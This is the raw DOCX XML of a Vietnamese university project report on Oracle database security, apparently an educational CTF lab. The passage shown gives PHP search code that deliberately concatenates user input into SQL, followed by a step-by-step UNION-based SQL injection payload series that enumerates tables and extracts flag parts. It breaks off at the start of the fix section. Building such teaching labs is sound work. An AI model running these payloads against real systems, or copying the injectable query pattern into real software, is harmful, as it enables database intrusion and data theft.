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0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve">🎓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ĐẠI HỌC FPT – CAMPUS HÀ NỘI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="6C757D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Khoa Công nghệ Thông tin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E85D04" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">BÁO CÁO ĐỒ ÁN MÔN DBS401</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Strengthening Database Security with Oracle Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhóm thực hiện: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Group 07</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
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="3286"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Họ và tên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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MSSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3286"/>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Vai trò</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>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(Thành viên 1 – Nhóm trưởng)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SE______</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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System Design, Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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(Thành viên 2)</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SE______</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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Backend PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>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(Thành viên 3)</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SE______</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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DB, Schema, Seed Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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(Thành viên 4)</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SE______</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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Security Testing, CTF Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>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(Thành viên 5)</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SE______</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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Deployment, Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Giảng viên hướng dẫn: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tên Giảng Viên)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngày nộp: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">________________ / 2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. GIỚI THIỆU</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 Bối cảnh bảo mật cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cơ sở dữ liệu (Database) là trung tâm lưu trữ mọi thông tin quan trọng của tổ chức, từ thông tin cá nhân người dùng đến dữ liệu tài chính và bí mật kinh doanh. Theo báo cáo của IBM Security (2023), chi phí trung bình của một vụ rò rỉ dữ liệu toàn cầu lên tới 4,45 triệu USD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle Database là một trong những RDBMS hàng đầu thế giới, được sử dụng rộng rãi trong tổ chức tài chính, giáo dục và chính phủ. Hiểu rõ các lỗ hổng bảo mật trong Oracle và cách vá chúng là kỹ năng thiết yếu cho kỹ sư phần mềm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Mục tiêu đồ án</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhóm 07 xây dựng một web application thực tế kết nối Oracle Database, cố tình tích hợp 3 lỗ hổng bảo mật, trình bày quy trình phát hiện – khai thác – vá lỗi, và xây dựng hệ thống CTF phục vụ học tập.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Cam kết an toàn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E85D04" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B45309"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ Tất cả nội dung khai thác trong đồ án này chỉ được thực hiện trên web application và Oracle Database do nhóm tự xây dựng. Không áp dụng bất kỳ kỹ thuật nào lên hệ thống thực tế hoặc bên thứ ba.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2.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Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Phiên bản</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4826"/>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Mục đích</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Ubuntu</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20.04/22.04 LTS</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Hệ điều hành server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Apache2</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2.4.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="482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Web server</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PHP</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8.1.x</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Backend scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Database</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XE 21c / 23c Free</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="482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Cơ sở dữ liệu chính</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Instant Client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21.x</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Kết nối PHP ↔ Oracle qua OCI8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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OCI8 PHP Extension</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3.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="482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Driver PHP cho Oracle Database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Python</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3.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Script khai thác Vulnerability 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. BA LỖ HỔNG BẢO MẬT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Vulnerability 1 – Oracle SQL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2013"/>
        <w:gridCol w:w="1000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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lỗ hổng (DBS401)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3013"/>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EASY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2013"/>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tìm flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>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bl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">📍 Vị trí: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search.php – tham số ?q=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chức năng tìm kiếm sinh viên nhận tham số q từ URL và nhúng trực tiếp vào câu lệnh SQL mà không sử dụng parameterized query. Blacklist chỉ ngăn DDL keywords (DROP, DELETE) nhưng KHÔNG ngăn UNION, SELECT, FROM – thành phần cốt lõi của SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D62828"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Đoạn code bị lỗi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// VULNERABLE – string concatenation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$sql = "SELECT student_id, full_name, major</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM STUDENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE full_name LIKE '%$keyword%'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        AND hidden_marker = 'NORMAL'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        AND ROWNUM &lt;= 5";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload khai thác (Oracle UNION-based):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Bước 1: Xác định 3 cột</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?q=' UNION SELECT NULL,NULL,NULL FROM DUAL WHERE '1'='1</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Bước 2: Liệt kê bảng Oracle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?q=' UNION SELECT ROWNUM,table_name,NULL FROM USER_TABLES WHERE ROWNUM&lt;=5 AND '1'='1</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Bước 3: Lấy Flag Part A từ FLAGS (hex encoded)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?q=' UNION SELECT 1,flag_part,flag_code FROM FLAGS WHERE part_order=1 AND '1'='1</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Bước 4: Lấy Flag Part B từ AUDIT_LOGS (reversed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?q=' UNION SELECT 1,metadata_note,action FROM AUDIT_LOGS WHERE action='SYSTEM_AUDIT_CHECK' AND '1'='1</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Bước 5: Lấy Flag Part C từ CONFIG_STORE (base64)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?q=' UNION SELECT 1,config_value,config_key FROM CONFIG_STORE WHERE config_key='sys_alpha_marker' AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D6A4F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cách vá lỗi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
